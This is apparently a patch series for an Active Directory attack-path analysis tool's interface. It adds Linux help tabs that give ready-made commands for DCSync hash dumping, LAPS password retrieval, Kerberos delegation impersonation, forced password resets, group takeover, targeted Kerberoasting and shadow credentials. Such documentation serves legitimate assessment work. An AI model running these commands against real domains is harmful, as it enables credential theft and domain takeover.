+                                    "secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'"
+                                }
+                            </code>
+                    </pre>
+
+                    <p>
+                        The AllExtendedRights privilege also grants {sourceName} enough{' '}
+                        privileges, to retrieve LAPS passwords domain-wise.
+                    </p>
+
+                    <p>
+                        <a href="https://github.com/n00py/LAPSDumper">LAPSDumper</a> can be used
+                         for that purpose:
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                            }
+                        </code>
+                    </pre>
+                </>
+            );
+    }
+};
+
+LinuxAbuse.propTypes = {
+    sourceName: PropTypes.string,
+    sourceType: PropTypes.string,
+    targetName: PropTypes.string,
+    targetType: PropTypes.string,
+    haslaps: PropTypes.bool
+}
+
+export default LinuxAbuse;
diff --git a/src/components/Modals/HelpTexts/AllExtendedRights/References.jsx b/src/components/Modals/HelpTexts/AllExtendedRights/References.jsx
index 55d10585d..e2f2159f1 100644
--- a/src/components/Modals/HelpTexts/AllExtendedRights/References.jsx
+++ b/src/components/Modals/HelpTexts/AllExtendedRights/References.jsx
@@ -10,6 +10,22 @@ const References = () => {
             <a href='https://www.youtube.com/watch?v=z8thoG7gPd0'>
                 https://www.youtube.com/watch?v=z8thoG7gPd0
             </a>
+            <br />
+            <a href='https://www.youtube.com/watch?v=z8thoG7gPd0'>
+                https://www.youtube.com/watch?v=z8thoG7gPd0
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword'>
+                https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/readlapspassword'>
+                https://www.thehacker.recipes/ad/movement/dacl/readlapspassword
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync'>
+                https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync
+            </a>
         </>
     );
 };
diff --git a/src/components/Modals/HelpTexts/AllExtendedRights/Abuse.jsx b/src/components/Modals/HelpTexts/AllExtendedRights/WindowsAbuse.jsx
similarity index 97%
rename from src/components/Modals/HelpTexts/AllExtendedRights/Abuse.jsx
rename to src/components/Modals/HelpTexts/AllExtendedRights/WindowsAbuse.jsx
index 00b598c49..fd6edf4c3 100644
--- a/src/components/Modals/HelpTexts/AllExtendedRights/Abuse.jsx
+++ b/src/components/Modals/HelpTexts/AllExtendedRights/WindowsAbuse.jsx
@@ -1,7 +1,7 @@
 import React from 'react';
 import PropTypes from 'prop-types';
 
-const Abuse = ({ sourceName, sourceType, targetName, targetType, haslaps }) => {
+const WindowsAbuse = ({ sourceName, sourceType, targetName, targetType, haslaps }) => {
     switch (targetType) {
         case 'User':
             return (
@@ -122,7 +122,7 @@ const Abuse = ({ sourceName, sourceType, targetName, targetType, haslaps }) => {
     }
 };
 
-Abuse.propTypes = {
+WindowsAbuse.propTypes = {
     sourceName: PropTypes.string,
     sourceType: PropTypes.string,
     targetName: PropTypes.string,
@@ -130,4 +130,4 @@ Abuse.propTypes = {
     haslaps: PropTypes.bool
 }
 
-export default Abuse;
+export default WindowsAbuse;

From 8c6b1e5d2269b423747589d4c64a7ca054a2b278 Mon Sep 17 00:00:00 2001
From: Shutdown <nwodtuhs+github@pm.me>
Date: Mon, 19 Dec 2022 16:37:11 +0100
Subject: [PATCH 09/32] AllowedToAct Linux abuse

---
 .../HelpTexts/AllowedToAct/AllowedToAct.jsx   | 14 ++++---
 .../HelpTexts/AllowedToAct/LinuxAbuse.jsx     | 37 +++++++++++++++++++
 .../HelpTexts/AllowedToAct/References.jsx     |  8 ++++
 .../{Abuse.jsx => WindowsAbuse.jsx}           |  6 +--
 4 files changed, 57 insertions(+), 8 deletions(-)
 create mode 100644 src/components/Modals/HelpTexts/AllowedToAct/LinuxAbuse.jsx
 rename src/components/Modals/HelpTexts/AllowedToAct/{Abuse.jsx => WindowsAbuse.jsx} (93%)

diff --git a/src/components/Modals/HelpTexts/AllowedToAct/AllowedToAct.jsx b/src/components/Modals/HelpTexts/AllowedToAct/AllowedToAct.jsx
index 2c3314e67..51a2014a4 100644
--- a/src/components/Modals/HelpTexts/AllowedToAct/AllowedToAct.jsx
+++ b/src/components/Modals/HelpTexts/AllowedToAct/AllowedToAct.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -16,13 +17,16 @@ const AllowedToAct = ({ sourceName, sourceType, targetName, targetType }) => {
                     targetName={targetName}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse sourceName={sourceName} />
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse sourceName={sourceName} />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse sourceName={sourceName} />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>
diff --git a/src/components/Modals/HelpTexts/AllowedToAct/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/AllowedToAct/LinuxAbuse.jsx
new file mode 100644
index 000000000..4360a5956
--- /dev/null
+++ b/src/components/Modals/HelpTexts/AllowedToAct/LinuxAbuse.jsx
@@ -0,0 +1,37 @@
+import React from 'react';
+import PropTypes from 'prop-types';
+
+const LinuxAbuse = ({ sourceName }) => {
+    return (
+        <>
+            First, if an attacker does not control an account with an
+            SPN set, a new attacker-controlled computer account can be
+            added with Impacket's addcomputer.py example script:
+            <pre>
+                <code>
+                    {
+                        "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                    }
+                </code>
+            </pre>
+            We can then get a service ticket for the service name (sname) we
+            want to "pretend" to be "admin" for. Impacket's getST.py example script
+            can be used for that purpose.
+            <pre>
+                <code>
+                    {
+                        "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                    }
+                </code>
+            </pre>
+            This ticket can then be used with Pass-the-Ticket, and could grant access
+            to the file system of the TARGETCOMPUTER.
+        </>
+    );
+};
+
+LinuxAbuse.propTypes = {
+    sourceName: PropTypes.string,
+};
+
+export default LinuxAbuse;
diff --git a/src/components/Modals/HelpTexts/AllowedToAct/References.jsx b/src/components/Modals/HelpTexts/AllowedToAct/References.jsx
index fd36e6918..e839d9ec7 100644
--- a/src/components/Modals/HelpTexts/AllowedToAct/References.jsx
+++ b/src/components/Modals/HelpTexts/AllowedToAct/References.jsx
@@ -26,6 +26,14 @@ const References = () => {
             <a href='https://github.com/Kevin-Robertson/Powermad#new-machineaccount'>
                 https://github.com/Kevin-Robertson/Powermad#new-machineaccount
             </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd'>
+                https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota'>
+                https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota
+            </a>
         </>
     );
 };
diff --git a/src/components/Modals/HelpTexts/AllowedToAct/Abuse.jsx b/src/components/Modals/HelpTexts/AllowedToAct/WindowsAbuse.jsx
similarity index 93%
rename from src/components/Modals/HelpTexts/AllowedToAct/Abuse.jsx
rename to src/components/Modals/HelpTexts/AllowedToAct/WindowsAbuse.jsx
index b0e9270f9..883e9a97d 100644
--- a/src/components/Modals/HelpTexts/AllowedToAct/Abuse.jsx
+++ b/src/components/Modals/HelpTexts/AllowedToAct/WindowsAbuse.jsx
@@ -1,7 +1,7 @@
 import React from 'react';
 import PropTypes from 'prop-types';
 
-const Abuse = ({ sourceName }) => {
+const WindowsAbuse = ({ sourceName }) => {
     return (
         <>
             <p>
@@ -38,8 +38,8 @@ const Abuse = ({ sourceName }) => {
     );
 };
 
-Abuse.propTypes = {
+WindowsAbuse.propTypes = {
     sourceName: PropTypes.string,
 };
 
-export default Abuse;
+export default WindowsAbuse;

From 920c0e0c0b0ceef8dd5bb63af332675aec2c0231 Mon Sep 17 00:00:00 2001
From: Shutdown <nwodtuhs+github@pm.me>
Date: Mon, 19 Dec 2022 16:47:44 +0100
Subject: [PATCH 10/32] AllowedToDelegate Linux abuse

---
 .../AllowedToDelegate/AllowedToDelegate.jsx   | 14 ++++++---
 .../AllowedToDelegate/LinuxAbuse.jsx          | 31 +++++++++++++++++++
 .../AllowedToDelegate/References.jsx          |  3 ++
 .../{Abuse.jsx => WindowsAbuse.jsx}           |  4 +--
 4 files changed, 45 insertions(+), 7 deletions(-)
 create mode 100644 src/components/Modals/HelpTexts/AllowedToDelegate/LinuxAbuse.jsx
 rename src/components/Modals/HelpTexts/AllowedToDelegate/{Abuse.jsx => WindowsAbuse.jsx} (96%)

diff --git a/src/components/Modals/HelpTexts/AllowedToDelegate/AllowedToDelegate.jsx b/src/components/Modals/HelpTexts/AllowedToDelegate/AllowedToDelegate.jsx
index f4630b7f4..293985e76 100644
--- a/src/components/Modals/HelpTexts/AllowedToDelegate/AllowedToDelegate.jsx
+++ b/src/components/Modals/HelpTexts/AllowedToDelegate/AllowedToDelegate.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -21,13 +22,16 @@ const AllowedToDelegate = ({
                     targetName={targetName}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse />
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>
diff --git a/src/components/Modals/HelpTexts/AllowedToDelegate/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/AllowedToDelegate/LinuxAbuse.jsx
new file mode 100644
index 000000000..0239cfb01
--- /dev/null
+++ b/src/components/Modals/HelpTexts/AllowedToDelegate/LinuxAbuse.jsx
@@ -0,0 +1,31 @@
+import React from 'react';
+
+const LinuxAbuse = () => {
+    return (
+        <>
+            <p>
+                In the following example, *victim* is the attacker-controlled
+                account (i.e. the hash is known) that is configured for
+                constrained delegation. That is, *victim* has the
+                "HTTP/PRIMARY.testlab.local" service principal name (SPN) set in
+                its msds-AllowedToDelegateTo property. The command first
+                requests a TGT for the *victim* user and executes the
+                S4U2self/S4U2proxy process to impersonate the "admin" user to
+                the "HTTP/PRIMARY.testlab.local" SPN. The alternative sname
+                "cifs" is substituted in to the final service ticket. This grants
+                the attacker the ability to access the file system of
+                PRIMARY.testlab.local as the "admin" user.
+            </p>
+
+            <pre>
+                <code>
+                    {
+                        "getST.py -spn 'HTTP/PRIMARY.testlab.local' -impersonate 'admin' -altservice 'cifs' -hashes :2b576acbe6bcfda7294d6bd18041b8fe 'domain/victim'"
+                    }
+                </code>
+            </pre>
+        </>
+    );
+};
+
+export default LinuxAbuse;
diff --git a/src/components/Modals/HelpTexts/AllowedToDelegate/References.jsx b/src/components/Modals/HelpTexts/AllowedToDelegate/References.jsx
index 924f7a56e..1145c5905 100644
--- a/src/components/Modals/HelpTexts/AllowedToDelegate/References.jsx
+++ b/src/components/Modals/HelpTexts/AllowedToDelegate/References.jsx
@@ -30,6 +30,9 @@ const References = () => {
             <a href='https://blog.harmj0y.net/redteaming/another-word-on-delegation/'>
                 https://blog.harmj0y.net/redteaming/another-word-on-delegation/
             </a>
+            <a href='https://www.thehacker.recipes/ad/movement/kerberos/delegations/constrained'>
+                https://www.thehacker.recipes/ad/movement/kerberos/delegations/constrained
+            </a>
         </>
     );
 };
diff --git a/src/components/Modals/HelpTexts/AllowedToDelegate/Abuse.jsx b/src/components/Modals/HelpTexts/AllowedToDelegate/WindowsAbuse.jsx
similarity index 96%
rename from src/components/Modals/HelpTexts/AllowedToDelegate/Abuse.jsx
rename to src/components/Modals/HelpTexts/AllowedToDelegate/WindowsAbuse.jsx
index 81e383115..7fb502b3f 100644
--- a/src/components/Modals/HelpTexts/AllowedToDelegate/Abuse.jsx
+++ b/src/components/Modals/HelpTexts/AllowedToDelegate/WindowsAbuse.jsx
@@ -1,6 +1,6 @@
 import React from 'react';
 
-const Abuse = () => {
+const WindowsAbuse = () => {
     return (
         <>
             <p>
@@ -35,4 +35,4 @@ const Abuse = () => {
     );
 };
 
-export default Abuse;
+export default WindowsAbuse;

From aac965badd1abe3b21d2df480e6696fbad17a9d4 Mon Sep 17 00:00:00 2001
From: Shutdown <nwodtuhs+github@pm.me>
Date: Mon, 19 Dec 2022 16:54:01 +0100
Subject: [PATCH 11/32] DCSync Linux abuse

---
 .../Modals/HelpTexts/DCSync/DCSync.jsx        | 14 ++++++----
 .../Modals/HelpTexts/DCSync/LinuxAbuse.jsx    | 28 +++++++++++++++++++
 .../Modals/HelpTexts/DCSync/References.jsx    |  4 +++
 .../DCSync/{Abuse.jsx => WindowsAbuse.jsx}    |  4 +--
 4 files changed, 43 insertions(+), 7 deletions(-)
 create mode 100644 src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx
 rename src/components/Modals/HelpTexts/DCSync/{Abuse.jsx => WindowsAbuse.jsx} (92%)

diff --git a/src/components/Modals/HelpTexts/DCSync/DCSync.jsx b/src/components/Modals/HelpTexts/DCSync/DCSync.jsx
index db59f816b..be48624bd 100644
--- a/src/components/Modals/HelpTexts/DCSync/DCSync.jsx
+++ b/src/components/Modals/HelpTexts/DCSync/DCSync.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -16,13 +17,16 @@ const DCSync = ({ sourceName, sourceType, targetName, targetType }) => {
                     targetName={targetName}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse />
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>
diff --git a/src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx
new file mode 100644
index 000000000..07137601a
--- /dev/null
+++ b/src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx
@@ -0,0 +1,28 @@
+import React from 'react';
+
+const LinuxAbuse = () => {
+    return (
+        <>
+            <p>
+                You may perform a dcsync attack to get the password hash of an
+                arbitrary principal using impacket's secretsdump.py example script:
+            </p>
+
+            <pre>
+                    <code>
+                        {
+                            "secretsdump 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'"
+                        }
+                    </code>
+            </pre>
+
+            <p>
+                You can also perform the more complicated ExtraSids attack to
+                hop domain trusts. For information on this see the blog post by
+                harmj0y in the references tab.
+            </p>
+        </>
+    );
+};
+
+export default LinuxAbuse;
diff --git a/src/components/Modals/HelpTexts/DCSync/References.jsx b/src/components/Modals/HelpTexts/DCSync/References.jsx
index c9efb1890..ee2a95b3a 100644
--- a/src/components/Modals/HelpTexts/DCSync/References.jsx
+++ b/src/components/Modals/HelpTexts/DCSync/References.jsx
@@ -10,6 +10,10 @@ const References = () => {
             <a href='https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/'>
                 https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
             </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync'>
+                https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync
+            </a>
         </>
     );
 };
diff --git a/src/components/Modals/HelpTexts/DCSync/Abuse.jsx b/src/components/Modals/HelpTexts/DCSync/WindowsAbuse.jsx
similarity index 92%
rename from src/components/Modals/HelpTexts/DCSync/Abuse.jsx
rename to src/components/Modals/HelpTexts/DCSync/WindowsAbuse.jsx
index 296a5a79a..eda3c16b0 100644
--- a/src/components/Modals/HelpTexts/DCSync/Abuse.jsx
+++ b/src/components/Modals/HelpTexts/DCSync/WindowsAbuse.jsx
@@ -1,6 +1,6 @@
 import React from 'react';
 
-const Abuse = () => {
+const WindowsAbuse = () => {
     return (
         <>
             <p>
@@ -23,4 +23,4 @@ const Abuse = () => {
     );
 };
 
-export default Abuse;
+export default WindowsAbuse;

From b7f2d709e66f402decc4c0f05960c21f1e087ab5 Mon Sep 17 00:00:00 2001
From: Shutdown <nwodtuhs+github@pm.me>
Date: Mon, 19 Dec 2022 16:59:07 +0100
Subject: [PATCH 12/32] ForceChangePassword Linux abuse

---
 .../ForceChangePassword.jsx                   | 14 ++++--
 .../ForceChangePassword/LinuxAbuse.jsx        | 49 +++++++++++++++++++
 .../ForceChangePassword/References.jsx        |  4 ++
 .../{Abuse.jsx => WindowsAbuse.jsx}           |  6 +--
 4 files changed, 65 insertions(+), 8 deletions(-)
 create mode 100644 src/components/Modals/HelpTexts/ForceChangePassword/LinuxAbuse.jsx
 rename src/components/Modals/HelpTexts/ForceChangePassword/{Abuse.jsx => WindowsAbuse.jsx} (96%)

diff --git a/src/components/Modals/HelpTexts/ForceChangePassword/ForceChangePassword.jsx b/src/components/Modals/HelpTexts/ForceChangePassword/ForceChangePassword.jsx
index b132e6d14..8b7a9732e 100644
--- a/src/components/Modals/HelpTexts/ForceChangePassword/ForceChangePassword.jsx
+++ b/src/components/Modals/HelpTexts/ForceChangePassword/ForceChangePassword.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -22,13 +23,16 @@ const ForceChangePassword = ({
                     targetType={targetType}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse sourceName={sourceName} sourceType={sourceType} />
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse sourceName={sourceName} sourceType={sourceType} />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse sourceName={sourceName} sourceType={sourceType} />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>
diff --git a/src/components/Modals/HelpTexts/ForceChangePassword/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/ForceChangePassword/LinuxAbuse.jsx
new file mode 100644
index 000000000..d44818225
--- /dev/null
+++ b/src/components/Modals/HelpTexts/ForceChangePassword/LinuxAbuse.jsx
@@ -0,0 +1,49 @@
+import React from 'react';
+import PropTypes from 'prop-types';
+
+const LinuxAbuse = ({ sourceName, sourceType }) => {
+    return (
+        <>
+            <p>
+                Use samba's net tool to change the user's password. The credentials can be supplied in cleartext
+                or prompted interactively if omitted from the command line. The new password will be prompted
+                if omitted from the command line.
+            </p>
+
+            <pre>
+                <code>
+                    {
+                        'net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                    }
+                </code>
+            </pre>
+
+            <p>
+                Pass-the-hash can also be done here with <a href='https://github.com/byt3bl33d3r/pth-toolkit'>pth-toolkit's net tool</a>.
+                If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
+            </p>
+
+            <pre>
+                <code>
+                    {
+                        'pth-net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                    }
+                </code>
+            </pre>
+            <p>
+                Now that you know the target user's plain text password, you can
+                either start a new agent as that user, or use that user's
+                credentials in conjunction with PowerView's ACL abuse functions,
+                or perhaps even RDP to a system the target user has access to.
+                For more ideas and information, see the references tab.
+            </p>
+        </>
+    );
+};
+
+LinuxAbuse.propTypes = {
+    sourceName: PropTypes.string,
+    sourceType: PropTypes.string,
+};
+
+export default LinuxAbuse;
diff --git a/src/components/Modals/HelpTexts/ForceChangePassword/References.jsx b/src/components/Modals/HelpTexts/ForceChangePassword/References.jsx
index 3b399596a..e61d89124 100644
--- a/src/components/Modals/HelpTexts/ForceChangePassword/References.jsx
+++ b/src/components/Modals/HelpTexts/ForceChangePassword/References.jsx
@@ -18,6 +18,10 @@ const References = () => {
             <a href='https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4724'>
                 https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4724
             </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword'>
+                https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword
+            </a>
         </>
     );
 };
diff --git a/src/components/Modals/HelpTexts/ForceChangePassword/Abuse.jsx b/src/components/Modals/HelpTexts/ForceChangePassword/WindowsAbuse.jsx
similarity index 96%
rename from src/components/Modals/HelpTexts/ForceChangePassword/Abuse.jsx
rename to src/components/Modals/HelpTexts/ForceChangePassword/WindowsAbuse.jsx
index 11946e6de..0efd399e2 100644
--- a/src/components/Modals/HelpTexts/ForceChangePassword/Abuse.jsx
+++ b/src/components/Modals/HelpTexts/ForceChangePassword/WindowsAbuse.jsx
@@ -1,7 +1,7 @@
 import React from 'react';
 import PropTypes from 'prop-types';
 
-const Abuse = ({ sourceName, sourceType }) => {
+const WindowsAbuse = ({ sourceName, sourceType }) => {
     return (
         <>
             <p>
@@ -69,9 +69,9 @@ const Abuse = ({ sourceName, sourceType }) => {
     );
 };
 
-Abuse.propTypes = {
+WindowsAbuse.propTypes = {
     sourceName: PropTypes.string,
     sourceType: PropTypes.string,
 };
 
-export default Abuse;
+export default WindowsAbuse;

From 810603ea3949dca7a25e055cf495ff55958bf7ec Mon Sep 17 00:00:00 2001
From: Shutdown <nwodtuhs+github@pm.me>
Date: Mon, 19 Dec 2022 17:37:04 +0100
Subject: [PATCH 13/32] GenericAll Linux abuse

---
 .../HelpTexts/GenericAll/GenericAll.jsx       |  20 +-
 .../HelpTexts/GenericAll/LinuxAbuse.jsx       | 489 ++++++++++++++++++
 .../HelpTexts/GenericAll/References.jsx       |  32 ++
 .../{Abuse.jsx => WindowsAbuse.jsx}           |   6 +-
 4 files changed, 539 insertions(+), 8 deletions(-)
 create mode 100644 src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx
 rename src/components/Modals/HelpTexts/GenericAll/{Abuse.jsx => WindowsAbuse.jsx} (99%)

diff --git a/src/components/Modals/HelpTexts/GenericAll/GenericAll.jsx b/src/components/Modals/HelpTexts/GenericAll/GenericAll.jsx
index 16f328114..4b566732e 100644
--- a/src/components/Modals/HelpTexts/GenericAll/GenericAll.jsx
+++ b/src/components/Modals/HelpTexts/GenericAll/GenericAll.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -23,8 +24,8 @@ const GenericAll = ({
                     targetType={targetType}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse
                     sourceName={sourceName}
                     sourceType={sourceType}
                     targetName={targetName}
@@ -32,10 +33,19 @@ const GenericAll = ({
                     targetId={targetId}
                 />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse
+                    sourceName={sourceName}
+                    sourceType={sourceType}
+                    targetName={targetName}
+                    targetType={targetType}
+                    targetId={targetId}
+                />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>
diff --git a/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx
new file mode 100644
index 000000000..49258b644
--- /dev/null
+++ b/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx
@@ -0,0 +1,489 @@
+import React from 'react';
+import PropTypes from 'prop-types';
+
+const LinuxAbuse = ({
+    sourceName,
+    sourceType,
+    targetName,
+    targetType,
+    targetId,
+    haslaps,
+}) => {
+    switch (targetType) {
+        case 'Group':
+            return (
+                <>
+                    <p>
+                        Full control of a group allows you to directly modify
+                        group membership of the group.
+                    </p>
+
+                    <p>
+                        Use samba's net tool to add the user to the target group. The credentials can be supplied in cleartext
+                        or prompted interactively if omitted from the command line:
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Pass-the-hash can also be done here with <a href='https://github.com/byt3bl33d3r/pth-toolkit'>pth-toolkit's net tool</a>.
+                        If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'pth-net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Finally, verify that the user was successfully added to the group:
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'net rpc group members "TargetGroup" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+                </>
+            );
+        case 'User':
+            return (
+                <>
+                    <p>
+                        Full control of a user allows you to modify properties
+                        of the user to perform a targeted kerberoast attack, and
+                        also grants the ability to reset the password of the
+                        user without knowing their current one.
+                    </p>
+
+                    <h4> Targeted Kerberoast </h4>
+
+                    <p>
+                        A targeted kerberoast attack can be performed using{' '}
+                        <a href='https://github.com/ShutdownRepo/targetedKerberoast'>targetedKerberoast.py</a>.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "targetedKerberoast.py -v -d 'domain.local' -u 'controlledUser' -p 'ItsPassword'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        The tool will automatically attempt a targetedKerberoast
+                        attack, either on all users or against a specific one if
+                        specified in the command line, and then obtain a crackable hash.
+                        The cleanup is done automatically as well.
+                    </p>
+
+                    <p>
+                        The recovered hash can be cracked offline using the tool
+                        of your choice.
+                    </p>
+
+                    <h4> Force Change Password </h4>
+
+                    <p>
+                        Use samba's net tool to change the user's password. The credentials can be supplied in cleartext
+                        or prompted interactively if omitted from the command line. The new password will be prompted
+                        if omitted from the command line.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Pass-the-hash can also be done here with <a href='https://github.com/byt3bl33d3r/pth-toolkit'>pth-toolkit's net tool</a>.
+                        If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'pth-net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+                    <p>
+                        Now that you know the target user's plain text password, you can
+                        either start a new agent as that user, or use that user's
+                        credentials in conjunction with PowerView's ACL abuse functions,
+                        or perhaps even RDP to a system the target user has access to.
+                        For more ideas and information, see the references tab.
+                    </p>
+
+                    <h4> Shadow Credentials attack </h4>
+
+                    <p>To abuse this privilege, use <a href='https://github.com/ShutdownRepo/pywhisker'>pyWhisker</a>.</p>
+
+                    <pre>
+                        <code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
+                    </pre>
+
+                    <p>
+                        For other optional parameters, view the pyWhisker documentation.
+                    </p>
+                </>
+            );
+        case 'Computer':
+            if (haslaps) {
+                return (
+                    <>
+                        <h4> Retrieve LAPS Password </h4>
+
+                        <p>
+                            Full control of a computer object is abusable when
+                            the computer's local admin account credential is
+                            controlled with LAPS. The clear-text password for
+                            the local administrator account is stored in an
+                            extended attribute on the computer object called
